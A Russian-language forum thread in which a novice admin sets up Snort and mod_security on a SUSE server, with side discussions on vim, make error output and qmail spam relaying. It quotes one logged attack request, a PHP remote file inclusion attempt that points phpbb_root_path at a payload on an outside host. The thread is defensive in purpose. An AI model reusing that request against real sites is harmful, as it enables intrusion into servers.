Да когда знаешь, не в лом набрать. Прописать то можно, но кто его знает как это может повлиять на что то другое.

По крайней мере в 10.1 снорт входит. Читай про систему управления пакетами и ставь "родной" пакет.
---
На вопрос "Что вы здесь делаете?" 78% респондентов ответили отрицательно.

Если ты имееш в виду версию сюзи, то стоит 9 с кусочком. Вроде запустил "мой" снорт но забыл ключик для включения лога. Теперь ищу как его обнаружить и убить.
Бум еще читать, но глаза и так уже на лоб лезут. По 13..14 часов каждый день сидеть за моником

хорошо :-)
В текущей директории лежит самосборный snort , как запуститъ глобалъный ?

Я так и знал, что тебя этои вопрос заинтересует, заломало писать предупреждение, что бы не спрашивал.
Тогда надо полный путь давать, иначе как говорил нафиг было суваться в текущий каталог. Но в путь тоже не помешает прописать. Хотя, думаю плюсы и минусы есть у каждого подхода.
Мне лично больше по душе ДОСовский подход.

А если он неизвестен ;-)
/bin /sbin /usr/bin /usr/local/bin , а может где-нибудь в opt ? Придется долго перебирать(про locate я надеюсь ты не знаешь)

Всё новое пугает , это доказано .
Хотя именно такие вещи в никсах более продуманы .

Тады валим с текущего, пусть сама ищет :)

Не..., только which добрые люди подсказали.

Пугает и не нравится это две разные вещи. Маке файлы я еше в детском садике видел, но они мне так до сих пор и не нравятся.

Вполне возможно, но именно из-за таких вещей я его и не люблю.

Сколько раз за сегодня материл ентот юникс подсчитать тяжело, но библиотеки в конце концов сделались, больше всего проблем было с мод секурити, то одно ей дай, то другое.
в итоге стопорнулся на этой ошибке:
ххх:/etc/init.d # ./apache2 configtest
Syntax error on line 9 of /etc/apache2/sysconfig.d/loadmodule.conf:
Cannot load /usr/lib/apache2/mod_security2.so into server: /usr/lib/apache2/mod_security2.so: undefined symbol: msr_log
Кстати, нашел очень неплохое описание по установке мод секурити:
http://www.novell.com/coolsolutions/feature/19399.html
хотя через маке не получается билдить, только через /apxs2 √cia
и абзац про yast не работает, то есть yast то запускается но никаких зависмостей связанных с мод секурити не выдает.
Кстати, бинарники для сюзи 9.1 тоже искал, не нашел.
Больше всего меня убило, что из редактора нельзя найти выход. Каким то образом зашел в vim /по хелпу потом узнал/, а выйти ну никак,пришлось консоль закрыть после 10 минутной броьбы с клавивтурой.

С таким уровнем ты не защитищь систему, а скорее наоткрываешь новых дыр.
Для начала введи команду "vimtutor".
---
Когда поломается интернет, можно будет подключиться к Анатолию Вассерману и восстановить его из кэша

Ну если для установки однго плагина и одной программы нужно досконально знать систему, да к тому же можно еще что-то попутно поломать,
то слава и хвала такой системе!

Вопрос: У меня проблемы с установкой программы под виндовс.
Ответ: Изучи для началп нотепад, это сильно поможет в решении проблемы.
Ничего не напоминает А вообще, я не знаю какой уровень дружелюбия дать интерфейсу пользователя, когда для выхода из программы надо нажать 4! клавиши "esc", ":", "q", "!"- при этом ":" и "!" надо еще найти /то бишь помнить какая раскладка клавы на сервере/. Совсем не уверен, что выход из других программ будет происходить аналогичным образом.

Ну да , мышковозам в никсах трудно ... ;-)

Не сравнивай вим с говном , которое и редактором назвать язык не поворачивается .
И зачем ты вообще в него полез , существуют же простенькие редакторы .

> Ну если для установки однго плагина и одной программы нужно досконально знать систему, да к тому же можно еще что-то попутно поломать,
> то слава и хвала такой системе!
Ты же хочешь настроить систему безопасности, а для этого нужно знать систему. А если тебе просто "поставить", то флаг в руки, но толку никакого не будет.
По поводу вима. Отличный редактор, очень удобный и вполне логичный, просто нужно потратить 20 минут на ознокомление, к тому же это основной инструмент настройки в твоем случае. Если так тяжко, попробуй нано или мцедит.

Какое блин трудно, кошмар. Дарог для мышей савсем нету.

Я в него не лез, он сам пришел :) Просто непонятно, зачем простые вещи делать так сложно. Хотя, немного понятно. Никсы зародились тады, кады был токи АЦ дисплей. Хотя почему не сделать было выход одной комбинацией с текстовым подтверждением, непонятно.
Мне редактора от мс хватает спокойно, хотя и не нашел как там текст выделять. Ежели что в виндах можно подправить.

Чтобы это делать надо действительно хорошо знать систему, а для этого нужно не одну шишку набить предварительно, поэтому такой задачи я не ставлю. Тем более что это нужно делать постоянно.
У меня гораздо проще задача. Для начала получить протокол действий злоумышленника. Затем найти дырку через которую лазять и ее заделать, заодно глянуть на подобные. Сервер сам по себе интереса не представляет, разве что как платцдарм для нападения на другой, более жирный. Почтовый сервер правда для спама пользуют, но это будет уже следующим этапом.

Если бы я работал все время в никсах, то задача была бы посложнее. Пока хотя бы поставить, а там уж видно будет.

Да не тяжко, если бы был нужен, доки прочитать не проблема. Просто как пример написал, накипело.
Вот еще один примерчик могу подкинуть.
Транслятор через маке гонит список ошибок на пару листов. Переназначение вывода ">" не работает, " | more" тоже не идет. И как тогда спрашивается узнать первую ошибку?

Сообщения об ошибках обычно пишутся в STDERR в то время как конструкции ">" и " | more" действуют на STDOUT.
Варианты решения (http://tldp.org/LDP/abs/html/io-redirection.html):
make 2>&1 | more

Это я тоже подумал, только не знал что stderr можно переназначить

А так не пойдет? Убегаю счас, пробовать некогда.
make &> еrror.txt
Спасибо, как раз кстати. Оказывается мод секурити 2 надо только через маке компилировать, а там вагон с тележкой ошибок. Полно людей имеет такую же ошибку как и у меня.
Зато удалось зарестироваться наконец на снорте /хвала суппорту/ теперь есть доступ к официальным правилам. Попробую наверное его установить следующим этапом.

После новогодней паузы, занялся опять апачем. Один этап прошел! Спасибо всем за поддержку
Мод секурити запустил и работает. Проблема была, что еще один путь поиска в майк файл добавить надо было. Попутно нашел еще один лог файл под гигабайт от апачей. Он оказыватся в двух местах пишет лог. Теперь надо хороший анализатор найти. Один нашел, он таких больших файлов не любит.
Кстати мод секурити за пару часов работы выловил уже одно покушение
GET /modules.php?name=News&file=article&sid=29/language/lang_english/lang_main_album.php?phpbb_root_path=http://forum.xxx.net/images/avatars/.as./figo.txt
правда вот логи засираются предпреждениями типа
modules.php][2] Warning. Operator EQ match: 0. [id "960903"] [msg "ModSecurity does not support content encodings"] [severity "WARNING"]
[rid#845cfb0][/modules.php][3] Could not set variable "resource.alerted_960903_compression" as the collection does not exist.
Пока есть только идея поискать в правилах 960903 и убить их. Есть ли лучший способ уменьшить логи мод секурити?

Мы гордимся тобой ;-)

Так я же не для похвастаться написал, а для отчета и новых вопросов.
Кстати, есть уже новый большой вопрос как мне gmail защитить \не google mail !\, что бы посторонние спам не слали через сервер. Глянул в настройки почты клиента - стоит ключик, что почта должна передаватся с паролем, но в логах почты на сервере полно строк где не похоже на использование пароля.
Сорри qmail, глаза залипли

qmqil?
---
Загорелся кошкин дом. Тилибом. Тилибом. ФААЯЯЯЯЯЯЯ!!! [Scooter]